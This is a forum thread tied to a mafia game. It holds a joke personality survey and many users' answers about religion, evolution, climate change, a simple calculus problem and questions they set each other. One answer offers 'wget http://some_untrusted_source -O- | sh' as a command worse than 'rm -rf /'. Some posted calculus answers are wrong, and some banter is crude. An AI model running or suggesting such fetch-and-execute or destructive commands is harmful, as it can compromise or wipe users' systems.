No-Playerlist Mafia - Game Over: Assassins and Unclesam win

Hello guys. You are experts so I will be rational.

I need anyone to give me two targets they believe to be the same faction. My role is to check if two persons have compatible WC's. (Guess if I hit two non-listers I'll get a positive result.)

Normally I would ask people on IRC but I can't get on during American timezones until Thursday. Do not claim to me, I don't have the time to lead.

I will only share the info I get thru my role to a guy who gives me my role PM. Then I'll check him with someone I have confirmed with my role.

Recapping: I'm the Invisible WC comparer. I need two targets for tonight, preferably with a reason why those guys. You can drop me the names anonymously over IRC if you can.

And please, don't you people claim not in. We know that everyone who is active and moderately good got in. Like me. :)

Bass

Brother in arms
is a Forum Moderator Alumnusis a Top CAP Contributor Alumnus
Hey everyone. It's me, Bass! I think this game is interesting. In fact, it is so interesting that it has given me the opportunity to embark on a thought provoking study. So I thought, why not just play a non anonymous game inside an anonymous game? It worked pretty well in the case of ete's Color Mafia, so I figure why not try something similar here?

To sign up, all you need to do is take my prescribed assessment of character. In layman's terms, this is just a survey. The rules are simple. The winner of the game will get an awesome secret prize.

Make sure you answer every question.
Your responses must be honest and complete.
You must post your responses in this thread.
You have one chance only. No exceptions.
You are guaranteed to do well if you follow these rules.
By reading everything up to this point, you acknowledge that any sentence following this one is not guaranteed to be 100% true.

There are a limited number of spots available. I will pick players based on results of the survey, so make sure your responses are thoughtful!

Though not for the faint of heart, I will compile all of the results and post my analysis here. Who knows. If the results are interesting, I may expand my study further,

Anyway, the survey is as follows:

1) Are you a coward? If yes, you may skip the next question and go to Section II.

2) Justify your answer.

1) Do you believe in God?

2) Do you believe in Evolution?

3) Do you believe in Anthropogenic Climate Change?

4) Explain your answers to (1), (2), and (3) in one sentence each.

1) Do you think you can best me in a game of Diplomacy?

2) Suppose you just got home from school. If you saw a cupcake lying out in the open, would you eat it?

3) Can you solve the following differential equation?
dy / dx = 2x

with the initial condition

y(0) = 0

(Write Yes or No)

4) If you answered "No" to the above question, write "I do not know enough Calculus" as your response to this question. If you answered "Yes", write the solution to the differential equation in the above question.

1) Write your own question here.

2) Look at the most recently posted survey response. Write your answer to the question that particular user wrote for (1) in Section IV of his or her survey here. If you are the first person to respond to the survey and therefore do not have a question to answer here, simply respond with "First!"

Good luck!

1) Are you a coward? If yes, you may skip the next question and go to Section II.

Nope

2) Justify your answer.

ok

No

Yes

Yes

While you don't really specify what God or what qualities he has, there is no evidence that a supernatural being exists.

Scientific consensus for evolution is overwhelming, ask a biologist if you want a better answer.

Scientific consensus for global warming is considerable, making Anthropogenic Climate Change the likely answer, ask a climate-man for more details.

Probably

2) Suppose you just got home from school. If you saw a cupcake lying out in the open, would you eat it?

No, but this does not make me a coward.

dy / dx = 2x

y(0) = 0

(Write Yes or No)

Yes

4) If you answered "No" to the above question, write "I do not know enough Calculus" as your response to this question. If you answered "Yes", write the solution to the differential equation in the above question.

x = ±sqrt(y)

1) What is your favourite musical instrument (feel free to repeat this question as your own question)?

2) First

Gmax

kuahahahaha
is a Forum Moderator Alumnus

No

2) Justify your answer.

Gambler

Yes

Yes

Yes

4.1 I don't believe in the traditional sense, but everything didn't just pop out of nothing I guess?

4.2 I'm satisfied with the proofs I've studied for evolution. I can't really provide a better answer.

4.3 I'm satisfied with the proofs I've studied for global warming, so yeah, i believe in anthropogenic climate change.

lol...

Without a doubt

dy / dx = 2x

y(0) = 0

(Write Yes or No)

Yes

x= +/- sqrt(y)

What is user billymills' real name?

2) Look at the most recently posted survey response. Write your answer to the question that particular user wrote for (1) in Section IV of his or her survey here. If you are the first person to respond to the survey and therefore do not have a question to answer here, simply respond with "First!"

What is your favourite musical instrument (feel free to repeat this question as your own question)?

Why, the bass guitar of course!

Good luck!

Crux

Banned deucer.
1) Are you a coward?

No

2) Justify your answer.

I defeated Gmax the woman in a duel to the death.

No

Yes

Yes

1. No evidence of any such being exists

2. I find the evidence to be as solid as shade's pectorial muscles.

3. See above.

I would crush you.

No, my parents probably poisoned it in some sick attempt to kill me.

dy / dx = 2x

y(0) = 0

Yes

x^2 = y

1) Write your own question here. What is Gmax's breast cup size?

Ojibwa

Most likely

2) Justify your answer.
Mission complete

Yes

No

Somewhat

1. I am a Christian.
2. I am a Christian who believes that God created all the creatures on this planet as they are.
3. I believe that humans are part of the problem but do not constitute a larger percentage than, say, the Sun.

Considering I have no idea what this is, no.

Only if there was a note next to it saying "Please eat; not poisoned."

dy / dx = 2x

y(0) = 0

(Write Yes or No)
Yes

y=x^2 (REBEL)

When there's something strange in your neighborhood, who you gonna call?

It's OVER 9000!

Good luck!

No

2) Justify your answer.
Avid hitchhiker, gambler, and prone to the dangerous and risky. Less brave, more curious (and stupid).

No.

It's not a question of "belief". Yes anyway.

Yes, but I don't feel its worth worry and media attention.

Short answer is no, but I feel like I chat with God whenever I don't have anyone else around to voice my thoughts to.
Evolution is at the point where its the foundation of modern biology, ignorance of facts is not evidence to the contrary.
We're making a noticeable impact but the earth is in not in danger, its just the quality of life we make for ourselves.

Maybe if I learned the game.
Easily
dy / dx = 2x

y(0) = 0

(Write Yes or No)
No

Didn't take calculus.

What is the ultimatum?

Ghostbusters Green Tea

Good luck!

I hope not.

2) Justify your answer.

Admittedly I am kind of neurotic, but I'd like to think all the scary things in my life I have faced with at least a little courage. Also, I'm not scared of much and I like fast rollercoasters.

Nopers.

Yup.

Yup.

1. I have no reason to believe in the Christian God or any kind of deity or spirit being, find me some overwhelming evidence first.

2. Not a biologist sadly but a lot of science rests on the evidence behind this theory, which is far more supported and trusted by the scientists in the field and I don't have any superior alternative to explain what evolution explains.

3. See above.

No, and I wouldn't like to try.

I would be tempted to if it looked untouched and unmelted, but do not trust my family and recently quit most sugary foods, so no.

dy / dx = 2x

y(0) = 0

(Write Yes or No)

Yes.

billymills said:
x = ±sqrt(y)
How I solved it: I stole billy's answer and hope he is not dragging me down with him. (It's not cheating or dishonest; it's being resourceful and having creative problem-solving skills, so if you're going to get all uptight about it, let me tell you EVERY JOB LISTING EVER features those two traits and I am just honing my skills. I don't know how to do calculus in Wolfram|Alpha)

Do you think Bass's name comes from the guitar, the fish, or an undying love of dubstep?

Midou said:
What is the ultimatum?
What I wanted to give Wild Eep but Mekkah led me far astray.

Not really.

2) Justify your answer.

I'm not afraid to stand up for myself and other people, although I am moderately concerned with my public image.

Yes.

Not completely.

Gesundheit.

1: I have been a Christian for 12 years and counting.

2: Certain parts of the evolution theory (the Big Bang, the age of the universe, etc.) I understand and can reconcile with Christianity, but others (the actual process of evolution) I disagree with.

3: I literally have no idea what that is. English please?

Probably not; I don't know what that is.

Nine times out of ten. Always if it's chocolate.

dy / dx = 2x

y(0) = 0

(Write Yes or No)

...No.

I know nothing about Calculus.

1) Write your own question here. If a tree falls in the forest and nobody is around to hear it, is UncleSam still a dick?

Do you think Bass's name comes from the guitar, the fish, or an undying love of dubstep?
A combination of the three, with the majority of it being dubstep.
Answer'd.

Ditto

/me huggles
is a Tournament Director Alumnusis a Forum Moderator Alumnusis a Community Contributor Alumnusis a Contributor Alumnusis a Battle Simulator Moderator Alumnus

No

2) Justify your answer.

I am cute

No, at least not one that still looks over us. There's too much shit going on to think of a merciful god that still cares about us.

Sure. I mean I have to, I play pokemon.

It may not be as big as some people make it, but we have to know that we are fucking the environment up in some way.

Don't know how to play Diplomacy, so probably not.

Depends on how big my lunch was.

dy / dx = 2x

y(0) = 0

(Write Yes or No)

Yes

I would, but once I became a theatre major I promised I would never do any math above basic algebra again.

Question: Why?

"If a tree falls in the forest and nobody is around to hear it, is UncleSam still a dick?"
Yes

MK Ultra

BOOGEYMAN
is a Forum Moderator Alumnus

No.

2) Justify your answer.

No.

Yes.

Yes.

Yes.

• I agree with the big bang but feel there must have been something 'godlike' for lack of a better term behind it.
  • There is a large amount of evidence.
  • There is a large amount of evidence. P.S. anthropogenic means human caused or influenced.

No.

No.

dy / dx = 2x

y(0) = 0

(Write Yes or No)

Yes.

x = ±sqrt(y)

What is your favourite/#1 album?

Ditto said:
Because we're here.

Bass said:

I don't think so.

2) Justify your answer.

I do take risks, but prefer to calculate the expected value first.

Yes

Not with the capital "E"

Yes

I have seen God do miracles, answer my prayers and micromanage circumstances everywhere.

Natural selection cannot produce Family-level structural changes in the genotype.

There haven't been any natural global scale catastrophes which could have caused the rapid temperature rise of the 20th century.

IRL yes, online no

Gladly

dy / dx = 2x

y(0) = 0

(Write Yes or No)

Yes

If f(x)=x²+c then f´(x)=2x, therefore x²+c is the set of functions that is the answer to the equation. Dunno the initial y. Oh right it forces c=0
I did it in my head, I haven't had the course on integrals yet :/

Name an Unix or Linux terminal command that is more dangerous than "rm -rf /" ran with superuser privileges and explain why the command you named is more dangerous.

2) Reply to the previous question.

I have listened to no #1 albums, nor albums at all for that matter :)

Good luck!
Also to answer the popular question: I cannot check myself because my flavour is a shipping fanfic writer and the PM claims no artist writes shipfics on themselves >_>

Ace Emerald

Cyclic, lunar, metamorphosing
is a Site Content Manager Alumnusis a Top Social Media Contributor Alumnusis a Senior Staff Member Alumnusis a Contributor Alumnus
Bass said:

Yes

2) Justify your answer.

No

Yes

Yes

There is no direct proof of any higher being, and religion is infamous for slowing down facts as it is a belief not likely to change, even when circumstances do. Evolution is a very logical process, it makes sense that creatures adapt to survival will continue to survive and reproduce. The evidence on the effect of CO2 as a known insulator is really all I need, knowing global trends that state we should be getting colder, while the overall trend of the world is warmer just cements it.

No

No, but not because I'm that great a person.

dy / dx = 2x

y(0) = 0

(Write Yes or No)

Yes

y=X^2. I could write out the official way to solve differential equations, but honestly I eyeballed it.

What is most important in your life? Family, friends, a significant other, your profession, etc.

Fuck Agape. Google and guessing gave me wget http://some_untrusted_source -O- | sh which is worse because the code could be potentially more destructive?

Ampharos

tag walls, punch fascists
is a Community Contributor Alumnus

no

2) Justify your answer.

I'm a pretty cool guy. I play mafia and doesn't afraid of anything.

Yes

Yes

No

1. There are some miracles on Earth that cannot be explained by anything other than the existence of a higher power.

2. There is a large amount of scientific evidence pointing towards the existence of evolution, and who says that God doesn't cause evolution?

3. The Earth has cycled between colder periods and warmer periods throughout its history, and I believe that we are entering one of these warmer periods.

Never played diplomacy, so no.

Hell yes

dy / dx = 2x

y(0) = 0

(Write Yes or No)

wut (no)

I do not know any enough calculus

Who is the best Beatle (John Lennon, Paul McCartney, George Harrison, or Ringo Starr) and why?

Gonna have to go with family.

Users Who Are Viewing This Thread (Users: 1, Guests: 0)